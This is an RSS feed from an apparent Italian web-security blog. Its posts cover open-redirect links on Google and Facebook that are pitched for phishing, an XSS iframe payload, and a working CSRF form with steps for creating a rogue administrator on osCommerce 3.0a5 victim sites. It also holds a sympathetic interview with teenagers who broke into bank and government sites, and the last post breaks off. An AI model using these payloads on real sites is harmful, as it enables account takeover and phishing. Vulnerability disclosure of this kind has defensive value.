<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Capn3m0 WebSecurity &#187; vulnerabilità</title>
	<atom:link href="http://www.capn3m0.org/tag/vulnerabilita/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.capn3m0.org</link>
	<description>...hacking, security, wifi and more...</description>
	<lastBuildDate>Wed, 08 Feb 2012 16:58:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Vulnerabilità Open Redirect e XSS per Google e FaceBook</title>
		<link>http://www.capn3m0.org/vulnerabilita-xss-open-redirection-google.html</link>
		<comments>http://www.capn3m0.org/vulnerabilita-xss-open-redirection-google.html#comments</comments>
		<pubDate>Thu, 26 Jan 2012 22:11:24 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[facebook exploit]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[google exploit]]></category>
		<category><![CDATA[opne redirect]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[web security]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=4704</guid>
		<description><![CDATA[Recentemente sono state individuate alcune vulnerabilità tra le pagine dei Servizi di Google e FaceBook. Sono falle di tipo Open Redirect che permettono di effettuare un redirect senza necessità di manipolare stringhe o eseguire azioni particolari. Open, infatti, sta ad indicare che il sito affetto da tale falla non effettua alcun controllo sull&#8217;input ed esegue il codice [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-thumbnail wp-image-4705" title="Google" src="http://www.capn3m0.org/wp-content/uploads/2012/01/Google-21-150x150.jpg" alt="Vulnerabilità Open Redirect e XSS per Google e FaceBook" width="150" height="150" /></p>
<p>Recentemente sono state individuate <strong>alcune vulnerabilità</strong> tra le pagine dei Servizi di <strong>Google e FaceBook</strong>. Sono falle di tipo <strong>Open Redirect </strong>che permettono di effettuare un redirect senza necessità di manipolare stringhe o eseguire azioni particolari.</p>
<p>Open, infatti, sta ad indicare che il sito affetto da tale falla non effettua alcun controllo sull&#8217;input ed <strong>esegue il codice per cui è programmato sempre e comunque</strong>. Il vantaggio di poter sfruttare vulnerabilità come questa è quello di poter utilizzare url di domini di cui la gente non mette in dubbio la provenienza (<strong>Google appunto</strong>) per farli cliccare e redirettarli a siti di <strong>phishing</strong> o similari.</p>
<p>Immaginate l&#8217;utente medio che riceve un&#8217;<strong>email clone di Google</strong> che gli indica di cliccare  un  url del dominio &#8220;<strong>google.com</strong>&#8221; ed inserire i suoi dati per via di un qualche motivo plausibile. <strong>Quanti penserebbero che quell&#8217;url nasconda una minaccia?</strong></p>
<p>In questo caso l&#8217;url affetto da tale vulnerabilità è appartenente al Servizio <strong>Google Accounts</strong> ed è il seguente:</p>
<p><cite><strong>https://accounts.google.com/o/oauth2/auth?redirect_uri=http://www.sitomalevolo.com</strong></cite></p>
<p>Allo stato attuale la falla è <strong>già stata risolta</strong> e provando un redirect verso <strong>capn3m0.org</strong> si ottiene un errore di &#8220;Bad Request&#8221;:</p>
<p><a href="https://accounts.google.com/o/oauth2/auth?redirect_uri=www.capn3m0.org" target="_blank">https://accounts.google.com/o/oauth2/auth?redirect_uri=www.capn3m0.org</a></p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/googlebadrequest.jpg" rel="lightbox[4704]" title="Google Bad Request"><img class="aligncenter size-medium wp-image-4706" title="Google Bad Request" src="http://www.capn3m0.org/wp-content/uploads/2012/01/googlebadrequest-300x118.jpg" alt="Vulnerabilità Open Redirect e XSS per Google e FaceBook" width="300" height="118" /></a></p>
<p>Questa vulnerabilità è stata individuata da <strong>Ucha Gobejishvili aka</strong><strong> longrifle0x</strong> che vanta solo nell&#8217;ultima settimana una serie di XSS in siti degni di nota:<strong> Google, Apple, Sony Ericcsson</strong>.</p>
<p>Sempre<strong> longrifle0x</strong> ha individuato una<a href="http://thehackernews.com/2012/01/cross-site-scripting-xss-vulnerability.html?utm_source=feedburner&amp;utm_medium=twitter&amp;utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Daily+Cyber+News+Updates%29" target="_blank"> vulnerabilità <strong>XSS</strong></a> alla pagina delle <strong>Google App for Business</strong>. Per verificare la vulnerabilità è necessario andare all&#8217;url:</p>
<p><a title="Google Apps for Business" href="https://www.google.com/a/cpanel/premier/new3?hl=en" target="_blank">https://www.google.com/a/cpanel/premier/new3?hl=en</a></p>
<p>ed inserire nel campo &#8220;Domain&#8221; questo codice:</p>
<p><strong><em>&lt;IFRAME SRC=&#8221;javascript:alert(&#8216;XSS&#8217;);&#8221;&gt;&lt;/IFRAME&gt;</em></strong></p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/xss-in-google.png" rel="lightbox[4704]" title="Google XSS"><img class="aligncenter size-medium wp-image-4710" title="Google XSS" src="http://www.capn3m0.org/wp-content/uploads/2012/01/xss-in-google-300x137.png" alt="Vulnerabilità Open Redirect e XSS per Google e FaceBook" width="300" height="137" /></a></p>
<p><strong><a title="longrifle0x Hacked Sites" href="http://xssed.com/archive/author=longrifle0x/" target="_blank">Qui</a></strong> il suo &#8220;curriculum&#8221;! <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="Vulnerabilità Open Redirect e XSS per Google e FaceBook" class='wp-smiley' title="Vulnerabilità Open Redirect e XSS per Google e FaceBook pics" /> </p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/fb.jpg" rel="lightbox[4704]" title="FaceBook Logo"><img class="alignright size-full wp-image-4708" title="FaceBook Logo" src="http://www.capn3m0.org/wp-content/uploads/2012/01/fb.jpg" alt="Vulnerabilità Open Redirect e XSS per Google e FaceBook" width="125" height="78" /></a>La seconda vulnerabilità, <a href="http://thehackernews.com/2012/01/url-redirection-vulnerability-in-google.html" target="_blank">individuata da <strong>ZeRtOx</strong></a> del gruppo <strong>Devitel</strong>, riguarda <strong>FaceBook</strong> ed è sempre di tipo <strong>Open Redirect.</strong> Il codice è il seguente:</p>
<p><strong><cite>http://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&amp;u=www.sitomalevolo.com</cite></strong></p>
<p>e attualmente è ancora presente come dimostra il link che rediretta a<strong> capn3m0.org:</strong></p>
<p><a href="http://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&amp;u=www.capn3m0.org" target="_blank">http://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&amp;u=www.capn3m0.org</a></p>
<p>Infine segnalo una terza vulnerabilità <strong>Open Redirect</strong> sempre per i Servizi di <strong>Google: Ad Services.</strong> I banner di Adsense sono associati ad un url fatto nel seguente modo:</p>
<p style="padding-left: 30px;">http://www.googleadservices.com/pagead/aclk?<br />
<strong>sa</strong>=L<br />
&amp;<strong>ai</strong>=BCN0tjMAhT9ijEq2Q0QXP1tm2BKGTn-sB4e7Th0fAjbcB8IQOEAEYASCZ0NoLOABQg7et0Pn_____AWD98vyD3BCgAYfM69oDsgEPd3d3LmNhcG4zbTAub3JnugEKMzM2eDI4MF9hc8gBBNoBUWh0dHA6Ly93d3cuY2FwbjNtMC5vcmcvZmlsZXNoYXJpbmctcG9zdC1tZWdhdXBsb2FkLWNoaXVzaS1maWxlc29uaWMtdXBsb2FkZWQuaHRtbIACAbgCGMgC4afaFKgDAfUDAAAgwPUDAAAAEIgGAaAGBA<br />
&amp;<strong>num</strong>=1<br />
&amp;<strong>cid</strong>=5GhoQFqmzEdFESSc_Vjf5Gxi<br />
&amp;<strong>sig</strong>=AOD64_2aoaqhlTxnKAENG806XtTTXpAjFw<br />
&amp;<strong>client</strong>=ca-pub-XXXXXXXXXXXXXXXX<br />
&amp;<strong>adurl</strong>=<strong>http://www.sitomalevolo.com</strong></p>
<p>I parametri che riceve in input devono essere tutti corretti ad eccezione del campo <strong>adurl</strong> che invece viene valorizzato con il link verso cui vogliamo che rediretti.</p>
<p>Come potete immaginare trovare un link con tutti i dati corretti è molto semplice. Basta navigare tra i siti che mostrano banner di <strong>Google AdSense</strong> e copiarsi il link.</p>
<p>Quest&#8217;ultima falla l&#8217;ho trovata ispirato dalle due precedenti mentre scrivevo l&#8217;articolo. Se conoscete chi ne ha parlato prima di me segnalatemelo che provvederò a mettere l&#8217;autore.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/vulnerabilita-xss-open-redirection-google.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Intervista: 10 domande al pr0_alpha_team (aka Alpha_Team)</title>
		<link>http://www.capn3m0.org/intervista-10-domande-al-pr0_alpha_team.html</link>
		<comments>http://www.capn3m0.org/intervista-10-domande-al-pr0_alpha_team.html#comments</comments>
		<pubDate>Tue, 10 Jan 2012 00:01:32 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Alpha_Team]]></category>
		<category><![CDATA[banca delle marche]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[pr0_alpha_team]]></category>
		<category><![CDATA[pro alpha team]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=4184</guid>
		<description><![CDATA[Lo staff di capn3m0.org ha avuto la possibilità di intervistare il pr0_alpha_team, crew emergente che si è fatta notare nei giorni passati per aver violato numerosi siti istituzionali: dai siti dei piccoli comuni al sito delle Banca delle Marche, lo Store del sito difesa.esercito.it e molti altri. Come immagine ho scelto la locandina del famoso film [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/hackersfillm.jpg" rel="lightbox[4184]" title="Hackers"><img class="alignleft" title="Hackers" src="http://www.capn3m0.org/wp-content/uploads/2012/01/hackersfillm-300x225.jpg" alt="Intervista: 10 domande al pr0 alpha team (aka Alpha Team)" width="300" height="225" /></a>Lo staff di <a title="Capn3m0 WebSecurity" href="http://www.capn3m0.org">capn3m0.org</a> ha avuto la possibilità di <strong>intervistare il <a title="pr0_alpha_team Twitter" href="http://twitter.com/pr0_alpha_team" target="_blank">pr0_alpha_team</a></strong>, crew emergente che si è fatta notare nei giorni passati <strong>per aver <a title="Siti istituzionali violati dal pr0_alpha_team" href="http://www.capn3m0.org/siti-istituzionali-violati-pr0_alpha_team.html">violato numerosi siti istituzionali</a></strong>: dai siti dei piccoli comuni al sito delle <strong>Banca delle Marche</strong>, lo<strong> Store del sito difesa.esercito.it</strong> e molti altri.</p>
<p>Come immagine ho scelto la locandina del famoso film <strong><a title="Hackers Film" href="http://en.wikipedia.org/wiki/Hackers_(film)" target="_blank">Hackers</a></strong> del 1995 che vede come protagonisti una crew di giovani ragazzi che un po&#8217; per divertimento un po&#8217; per passione portarono a termine attacchi di grande portata scombussolando una città e finendo nel mirino dell&#8217;Fbi. Il film, come si sa, è finzione, ma è stato di ispirazione per molti ragazzini che come me <strong>sognavano di diventare hacker</strong> o qualcosa del genere.</p>
<p>Il motto del film era:</p>
<p style="padding-left: 30px;"><em><strong>their only crime was curiosity</strong></em></p>
<p style="padding-left: 30px;"><em><strong>(il loro unico crimine era la curiosità)</strong></em></p>
<p>Conoscendo un po&#8217; meglio i ragazzi del <strong>pr0_alpha_team</strong> mi è tornato alla mente e vediamo perché.</p>
<div class="woo-sc-hr"></div>
<p><strong>D #1: &#8211; Come nasce il pr0_alpha_team? E&#8217; stata più una cosa tra amici tipo &#8220;vediamo fin dove riusciamo ad arrivare&#8221; o strutturata e organizzata?</strong></p>
<p>L&#8217;<strong>Alpha_Team</strong> nasce come un gruppo di ragazzi (amici virtuali) , che sfida le infrastrutture che al giorno d&#8217;oggi dovrebbero essere le più sicure, cercando di far notare ai cari Italiani <strong>quanto siano vulnerabili i loro sistemi e come dati privati possano finire nelle mani di gente qualunque</strong>.</p>
<p><strong>D #2 - Il nome pr0_alpha_team da dove proviene? Siete una versione &#8220;alpha&#8221; quindi ancora non ufficiale? cosa dobbiamo aspettarci?<br />
</strong></p>
<p>Allora il nome Alpha_Team deriva dalla poca fantasia che avevamo quando ci siamo registrati su <strong><a title="Zone-H pr0_alpha_team" href="http://www.zone-h.org/archive/notifier=alpha_team" target="_blank">Zone-H</a></strong>, cosa dovreste aspettarvi? beh<strong> spero per noi che potremmo ancora divertirci nel cercare vulnerabilità <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_smile.gif' alt="Intervista: 10 domande al pr0 alpha team (aka Alpha Team)" class='wp-smiley' title="Intervista: 10 domande al pr0 alpha team (aka Alpha Team) pics" /> </strong></p>
<p><strong>D #3 - </strong><strong> Guardando il vostro profilo su Zone-H s</strong>i ha notizia di voi a partire da Novembre. Siete una crew &#8220;emergente&#8221; o operate da tempo ma solo ora volete rendere note le vostre azioni?</p>
<p>In precedenza abbiamo operato come singoli , ma poi un giorno abbiamo deciso di unirci e diventare l&#8217;<strong>Alpha_Team e rendere note le nostre azioni</strong>.<br />
<strong></strong></p>
<p><strong>D #4 &#8211; Il vostro background? Siete &#8220;ethical hacker&#8221; anche come lavoro?<br />
</strong></p>
<p>Siamo tutti studenti delle superiori ma in futuro vorremo sicuramente lavorare in quel campo, non ci definiamo hacker, ma solo <strong>appassionati informatici</strong>.<br />
<strong></strong></p>
<p><strong>D #5 &#8211; Indipendenti o parte di un progetto più grande?<br />
</strong></p>
<p>Siamo un gruppetto indipendente.</p>
<p><strong>D #6 &#8211; Perché siti istituzionali? Quale messaggio volete mandare?<br />
</strong></p>
<p>Attacchiamo siti importanti sia per divertimento sia per far capire ai nostri cari webmaster come sia facile sfruttare le loro mancanze. Per esempio nell&#8217;<strong>attacco alla Banca delle Marche</strong> volevamo far capire ai webmaster come sia stato facile per noi <strong>reperire informazioni sensibili</strong>.</p>
<p><strong>D #7 &#8211; Fino ad ora le vittime illustri sono state violate con attacchi Sql Injection. E&#8217; la tecnica che preferite o è quella a cui, come si è visto, erano vulnerabili tutte le vittime?<br />
</strong></p>
<p>Perché in quei siti abbiamo trovato quel tipo di vulnerabilità.</p>
<p><strong>D #8 &#8211; Il silenzio della stampa. I giornali latitano sempre quando l&#8217;attacco non è firmato Anonymous che &#8220;fa audience&#8221;. Cosa ne pensate di questa dis-informazione?<br />
</strong></p>
<p>Pensiamo che al giorno d&#8217;oggi non ci sia dis-informazione ma solo poca voglia di reperire informazioni da utenti che utilizzano internet. Tutti dovrebbero sapere che rischi corrono navigando su internet.</p>
<p><strong>D #9 &#8211; Il termine hacker ancora oggi viene usato in maniera errata e non si fanno mai distinzioni tra ethical, white hat, black hat, etc.. Voi come vi definite?<br />
</strong></p>
<p>Siamo solo ragazzi appassionati di informatica.</p>
<p><strong>D #10 &#8211; Il sito di una Banca, il sito dello store della Difesa&#8230; le vostre azioni hanno messo ancora una volta in rilievo le carenze tecniche in merito alla sicurezza informatica. In Italia spendere soldi per prevenire appare ancora una &#8220;cattiva abitudine&#8221; (purtroppo). Le vostre vittime se informate della violazione come han reagito? Le falle poi vengono sistemate?</strong></p>
<p>Reagirebbero malissimo. Come possiamo vedere nel <strong>sistema bancario delle Marche</strong> ci troviamo di fronte ad un C.M.S. a pagamento, e credo che non lo abbiano pagato poco. No, le falle ad oggi sono come prima.</p>
<div class="woo-sc-hr"></div>
<p>Concludendo questa intervista ne emerge ancora una volta la <strong>scarsa attenzione dedicata alla sicurezza informatica</strong>, dei nostri <strong>dati</strong> e delle <strong>infrastrutture</strong> che il nostro Paese presta ai suoi servizi più importanti o critici. Questi ragazzi, come ho premesso citando il film &#8220;<strong>Hackers</strong>&#8220;, sono <strong><em>solo appassionati e curiosi</em></strong>. I mezzi e le competenze li hanno e stanno dimostrando come uniti si possono raggiungere obiettivi importanti come il sito di una <strong>Banca</strong> o dell&#8217;<strong>Esercito</strong>. Non sono legati a nessun gruppo &#8220;famoso&#8221; e pertanto del <strong>pr0_alpha_team</strong> sono in pochi a parlare ma, come loro stessi hanno affermato, vogliono rendere note le loro azioni.</p>
<p><a href="http://www.capn3m0.org/wp-content/uploads/2012/01/alpha.jpg" rel="lightbox[4184]" title="pr0_alpha_team"><img class="alignright size-thumbnail wp-image-4159" title="pr0_alpha_team" src="http://www.capn3m0.org/wp-content/uploads/2012/01/alpha-150x150.jpg" alt="Intervista: 10 domande al pr0 alpha team (aka Alpha Team)" width="150" height="150" /></a>Sul tema della <strong>disinformazione</strong> fanno un&#8217;osservazione corretta dicendo che ai giorni d&#8217;oggi con internet a disposizione di chiunque è difficile pensare che la gente sia male o per niente informata. Almeno i giornalisti pagati per &#8220;informare&#8221; potrebbero provare a fare quello sforzo in più che noi non sempre abbiamo tempo o modo di fare.</p>
<p>Riguardo infine l&#8217;attacco al sito della <strong>Banca delle Marche (<a title="Banca delle Marche" href="http://www.bancamarche.it/" target="_blank">bancadellemarche.it</a>) </strong>ci fanno sapere che nonostante i soldi spesi per un CMS risultato vulnerabile (può capitare eh, nessuno mette in dubbio che ci possano essere bug) <strong>non è stata ancora sistemata la falla</strong>. Sono queste le notizie che tra le tutte dovrebbero far riflettere. Possibile che una Banca dopo aver riscontrato delle violazioni nei propri dati non ne faccia notizia e neanche rimedia in tempi brevi?</p>
<p><strong>Errare è umano, ma perseverare è diabolico..</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/intervista-10-domande-al-pr0_alpha_team.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; osCommerce v3.0a5 Multiple Vulnerabilities</title>
		<link>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html</link>
		<comments>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html#comments</comments>
		<pubDate>Fri, 20 May 2011 19:14:17 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[osCommerce 3]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[xsrf]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2725</guid>
		<description><![CDATA[Seguendo la scia di notizie degli ultimi tempi che han portato alla luce gravi vulnerabilità per le ultime versioni di OsCommerce (2.3.1) e ZenCart (1.3.9h) non poteva mancare all&#8217;appello anche l&#8217;ultimissima alpha release osCommerce 3.0.a5. Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/osCommerceLogo.jpg" rel="lightbox[2725]" title="osCommerceLogo"><img class="alignleft size-thumbnail wp-image-2726" title="osCommerceLogo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/osCommerceLogo-150x137.jpg" alt="[EXPLOIT]   osCommerce v3.0a5 Multiple Vulnerabilities" width="150" height="137" /></a>Seguendo la scia di notizie degli ultimi tempi che han portato alla luce <strong>gravi vulnerabilità</strong> per le ultime versioni di <strong><a href="http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html">OsCommerce (2.3.1)</a> e<a href="http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html"> ZenCart (1.3.9h)</a></strong> non poteva mancare all&#8217;appello anche l&#8217;ultimissima alpha release <strong>osCommerce 3.0.a5</strong>.</p>
<p>Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente &#8220;stabili&#8221; sono state bucate da molteplici vulnerabilità. Nella release specifica, che ripetiamo si tratta di una alpha, sono state individuate vulnerabilità di tipo <strong>Xss, Full Path Disclosure, Local File Inclusion e XSRF</strong>.</p>
<p>La<strong> Full Path Disclosure</strong> consiste nell&#8217;interrogare alcuni file del Template di OsCommerce che, andando in errore,<strong> mostrano a video la full path</strong> della loro posizione sul Server. Con questa sola informazione si può fare poco ma, anche in questo caso, se unita ad altri tipi di attacchi diventa una utile informazione. La <strong>XSS permette di iniettare codice JavaScript </strong>sfruttando una falla del file &#8220;products.php&#8221; mentre la <strong>Local File Inclusion</strong> consente di richiamare file presenti sul Server sfruttando la procedura di disinstallazione moduli del Cms che non verifica opportunamente i parametri passati e permette di accettare in input qualsiasi path raggiungibile.</p>
<p>Anche in questo caso c&#8217;è una <strong>falla più grave </strong>delle altre e a mio avviso è la <strong>XSRF</strong> che permette di inviare comandi all&#8217;applicativo senza che questi vengano verificati in alcun modo. Nel caso specifico <strong>sarà possibile creare un nuovo Admin sull&#8217;OsCommerce</strong>.</p>
<p>Basterà creare una pagina &#8220;.html&#8221; contenente il seguente codice:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;html&gt;
&lt;body&gt;
&lt;form action=&quot;http://&lt;sito vittima&gt;/admin/index.php?administrators&amp;action=save&quot; method=&quot;post&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;user_name&quot; value=&quot;&lt;nomeutente&gt;&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;user_password&quot; value=&quot;&lt;password&gt;&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;modules[]&quot; value=&quot;0?&gt;
&lt;input type=&quot;hidden&quot; name=&quot;subaction&quot; value=&quot;confirm&quot;/&gt;
&lt;input type=&quot;submit&quot; value=&quot;Save&quot;&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre></div></div>

<p>Ovviamente dovrete sostituire i seguenti parametri:</p>
<p><strong>&lt;sito vittima</strong>&gt; con il dominio del sito in cui si vuole creare l&#8217;account</p>
<p><strong>&lt;nomeutente&gt;</strong> con il nome utente del nuovo Admin</p>
<p><strong>&lt;password&gt;</strong> con la password da associare al nuovo Admin</p>
<p>Una volta creata la pagina richiamatela dal vostro Browser e cliccate su &#8220;Save&#8221;.</p>
<p>Se tutto è andato a buon fine accedendo all&#8217;url:</p>
<p><cite>http://&lt;sito vittima&gt;/admin/</cite></p>
<p><strong>potrete loggarvi come Admin</strong> con i dati appena inseriti.</p>
<p>Per informazioni dettagliate vi rimando al link del <strong>Dr. Alberto Fontanella</strong> autore dell’articolo.</p>
<p><a href="http://ictsec.wordpress.com/exploits/oscommerce-v3-0a5-multiple-vulnerabilities/" target="_blank">osCommerce v3.0a5 [ Multiple Vulnerabilities ]</a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; ZenCart 1.3.9h Multiple Vulnerabilities</title>
		<link>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html</link>
		<comments>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html#comments</comments>
		<pubDate>Fri, 20 May 2011 17:37:19 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[Arbitrary File Upload]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack zencart]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[zencart]]></category>
		<category><![CDATA[zencart 1.3.9h]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2723</guid>
		<description><![CDATA[E&#8217; ormai consuetudine che dopo l&#8217;individuazione di una nuova falla per OsCommerce a catena vengano individuate le stesse (o quasi) falle per ZenCart, altro noto Cms derivato dallo stesso OsCommerce. La versione vulnerabile è l&#8217;ultima disponibile ossia la 1.3.9h e presenta vulnerabilità di vario tipo: Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/zencart_logo.jpg" rel="lightbox[2723]" title="zencart_logo"><img class="alignleft size-thumbnail wp-image-2724" title="zencart_logo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/zencart_logo-150x88.jpg" alt="[EXPLOIT]   ZenCart 1.3.9h Multiple Vulnerabilities" width="150" height="88" /></a>E&#8217; ormai consuetudine che dopo l&#8217;individuazione di una <a href="http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html"><strong>nuova falla</strong></a> per OsCommerce a catena vengano individuate le stesse (o quasi) falle per<a href="http://www.zen-cart.com/" target="_blank"> <strong>ZenCart</strong></a>, altro noto Cms derivato dallo stesso OsCommerce.</p>
<p>La versione vulnerabile è l&#8217;ultima disponibile ossia la <strong>1.3.9h</strong> e presenta vulnerabilità di vario tipo: <strong>Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File Upload</strong>.</p>
<p>La vulnerabilità <strong>Full Path Disclosure</strong> permette, se la gestione degli errori è configurata per mostrarli a video, di<strong> conoscere la path assoluta</strong> dell&#8217;applicativo. Di per sé non è una falla che consente di effettuare alcun tipo di azione ma l&#8217;informazione che si ottiene potrebbe essere utile se unita ad attacchi che vanno a scrivere sul FileSystem o similari. Le due <strong>XSS</strong>, invece, non affliggono l&#8217;attuale 1.3.9h ma <strong>tutte le versioni precedenti</strong>. Le vulnerabilità sono localizzate nel campo &#8220;Quantità&#8221; del carrello che permette l<strong>&#8216;injection di codice XSS</strong> e nell&#8217;Area Amministrativa &#8220;Location/Taxes&#8221;. Per quest&#8217;ultima, quindi, si presume che si abbia già l&#8217;accesso Admin.</p>
<p>L&#8217;ultima vulnerabilità, la più grave, riguarda invece il <strong>componente Banner (banner_manager.php)</strong> che, così come per OsCommerce, permette di <strong>effettuare l&#8217;upload di files</strong> che verranno salvati nella cartella &#8220;images&#8221;.</p>
<p>Per informazioni dettagliate vi rimando al link del <strong>Dr. Alberto Fontanella</strong> autore dell&#8217;articolo.</p>
<p><a href="http://ictsec.wordpress.com/exploits/zen-cart-v-1-3-9h-multiple-vulnerabilities/" target="_blank">Zen Cart &lt;= v.1.3.9h [ Multiple Vulnerabilities ]</a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; OsCommerce 2.3.1 Remote File Upload Vulnerability</title>
		<link>http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html</link>
		<comments>http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html#comments</comments>
		<pubDate>Thu, 19 May 2011 18:31:22 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[authentication bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[osCommerce 2.3.1]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[remote file upload]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2630</guid>
		<description><![CDATA[Come ricordete l&#8217;ultima volta che venne nominato l&#8217;ecommerce OsCommerce su questo sito era per segnalare una grave vulnerabilità presente in tutte le versioni. La falla era presente anche in diverse versioni di ZenCart in quanto derivato da OsCommerce stesso. A distanza di 2 anni i programmatori, dopo una lunga latitanza, hanno rilasciato 2 nuove versioni: [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/oscommerce_logo.gif" rel="lightbox[2630]" title="oscommerce_logo"><img class="alignleft size-thumbnail wp-image-2631" title="oscommerce_logo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/oscommerce_logo-150x114.gif" alt="[EXPLOIT]   OsCommerce 2.3.1 Remote File Upload Vulnerability" width="150" height="114" /></a>Come ricordete l&#8217;ultima volta che venne nominato l&#8217;ecommerce <a href="http://oscommerce.com/" target="_blank"><strong>OsCommerce</strong></a> su questo sito era per <a href="http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html">segnalare</a> una <strong>grave vulnerabilità</strong> presente in tutte le versioni. La falla era presente anche in diverse versioni di ZenCart in quanto derivato da OsCommerce stesso.</p>
